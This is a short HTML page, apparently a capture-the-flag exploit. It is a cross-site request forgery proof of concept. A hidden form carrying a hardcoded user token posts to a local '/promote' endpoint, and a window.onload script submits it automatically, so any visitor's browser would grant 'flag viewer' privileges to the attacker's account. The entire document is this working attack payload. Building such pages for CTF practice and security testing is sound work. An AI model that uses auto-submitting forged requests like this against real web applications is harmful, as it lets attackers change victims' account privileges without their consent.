<!DOCTYPE html>
<html>
<body>

<h1>ctf</h1>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>

<form id='theForm' action="http://localhost:1001/promote" method="post">
	<h2>Promote a user to a flag viewer</h2>
	<input name="user_token" value="7e46ea28-f9db-444b-beda-ffd3e7d0efba" style="width: 100%">
	<input type="submit" style="margin-top: 20px;">
</form>

<script type="text/javascript">
function codeAddress() {
	document.getElementById('theForm').submit();
}
window.onload = codeAddress;
</script>
</body>
</html>

